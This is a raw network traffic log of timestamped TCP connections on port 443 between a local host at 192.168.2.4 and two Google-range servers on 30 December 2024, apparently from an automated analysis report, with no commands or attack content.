                                                                                                              Dec 30, 2024 11:36:54.464867115 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.846774101 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.846836090 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.847570896 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.847625017 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.849385023 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.849395037 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.849678040 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.849867105 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.850363016 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.857857943 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.857935905 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.858652115 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.858709097 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.860264063 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.860271931 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.860537052 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.860599995 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.860897064 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:54.895323992 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.907320976 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.911160946 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.911307096 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:54.911719084 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:54.911725998 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:54.911884069 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:54.911889076 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.072582960 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.072695971 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.073107004 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.073117971 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.073272943 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.073277950 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.219222069 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.219289064 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.219331026 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.219392061 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.219454050 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.219480038 CET44350111142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.219521999 CET50111443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.220052958 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.220105886 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.220201969 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.220418930 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.220438957 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.241621017 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.241682053 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.241712093 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.242376089 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.242429972 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.242489100 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.242511034 CET44350112142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.242523909 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.243109941 CET50112443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.243355989 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.243400097 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.243640900 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.244085073 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.244103909 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.320904016 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.320955992 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.320979118 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.321000099 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.321013927 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.321038961 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.321044922 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.321082115 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.321120024 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.321758986 CET50113443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.321770906 CET44350113142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.322483063 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.322529078 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.322624922 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.323390007 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.323405027 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486187935 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486229897 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486257076 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.486293077 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486304998 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.486324072 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.486329079 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486336946 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.486377001 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.487188101 CET50114443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.487209082 CET44350114142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.487736940 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.487773895 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.487833977 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.488043070 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.488049984 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.843487024 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.843852997 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.844223022 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.844403982 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.847497940 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.847644091 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.847718954 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.847735882 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.847973108 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.848227978 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.848238945 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.848351955 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.848543882 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.859469891 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.859486103 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.859774113 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.860526085 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.861166000 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:55.891328096 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.903323889 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.925725937 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.925786018 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.926800013 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.926811934 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:55.928932905 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:55.928937912 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.107836008 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.111993074 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.208112955 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.208461046 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.209376097 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.209414959 CET44350123142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.209460974 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.228327990 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.228666067 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.228679895 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.229126930 CET44350122142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.229192972 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.365468025 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.365525007 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.365628004 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.365709066 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.392815113 CET50124443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.392890930 CET44350124142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.393253088 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.393280983 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.393670082 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.393675089 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.393712044 CET50123443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.393728971 CET50122443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.430151939 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.430181026 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.430381060 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.435492039 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.435506105 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.440051079 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.440093994 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.440361977 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.441078901 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:56.441096067 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.716331959 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.716381073 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.716398954 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.716411114 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.716483116 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:56.716495991 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.716674089 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.719157934 CET50128443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:56.719171047 CET44350128142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.038606882 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.038710117 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.039299965 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.039305925 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.039498091 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.039513111 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.059771061 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.059848070 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.060298920 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.060305119 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.060574055 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.060578108 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.405020952 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.405081987 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.405447006 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.405487061 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.405652046 CET44350131142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.405744076 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.405745029 CET50131443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.406043053 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.406090021 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.406228065 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.406302929 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.406346083 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.406558037 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.406773090 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.406791925 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.406985044 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.407001972 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.431036949 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.431126118 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.431154013 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.431339025 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.431432962 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.431468964 CET44350132142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.431515932 CET50132443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.431910038 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.431946039 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.431998014 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.432032108 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.432039022 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.432163954 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.432230949 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:57.432238102 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:57.432363033 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:57.432369947 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.032488108 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.032558918 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.033279896 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.034959078 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.035208941 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.035295963 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.035427094 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.035446882 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.035765886 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.035773039 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.036148071 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.036652088 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.036721945 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.036742926 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.037012100 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.037301064 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.037930012 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.037935972 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.038316965 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.038332939 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.038456917 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.038758993 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.039024115 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.039827108 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.042131901 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.042201042 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.042464018 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.042475939 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.042591095 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.042597055 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.079329967 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.083329916 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.400480986 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.400551081 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.400561094 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.400635958 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.400779963 CET50147443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.400803089 CET44350147142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.401335001 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.401380062 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.401439905 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.401688099 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.401705980 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418028116 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418088913 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418098927 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418239117 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418292046 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418318033 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418585062 CET44350146142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418657064 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418658018 CET50146443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418831110 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.418872118 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.418999910 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.419198990 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:58.419209957 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454783916 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454832077 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454854965 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.454873085 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454884052 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.454906940 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.454912901 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454932928 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.454971075 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.459975004 CET50145443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.459997892 CET44350145142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.461049080 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.461074114 CET44350158142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.461946964 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.462327957 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.462340117 CET44350158142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.597560883 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.597599983 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.597621918 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.597649097 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.597660065 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.597713947 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.597733021 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.597763062 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.661926031 CET50148443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.661956072 CET44350148142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.676008940 CET50159443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.676034927 CET44350159142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:58.676147938 CET50159443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.677994967 CET50159443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:58.678009033 CET44350159142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.002621889 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.002712965 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.003566980 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.003614902 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.041583061 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.041667938 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.042345047 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.042433977 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.069947004 CET44350158142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.072293997 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:59.148812056 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.148837090 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.149168968 CET44350156142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.149332047 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.150245905 CET50156443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.150494099 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.150516987 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.150808096 CET44350157142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.151963949 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.153088093 CET50157443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:59.159126043 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:59.159141064 CET44350158142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.159259081 CET50158443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:59.159265041 CET44350158142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:59.195326090 CET44350156142.250.186.142192.168.2.4
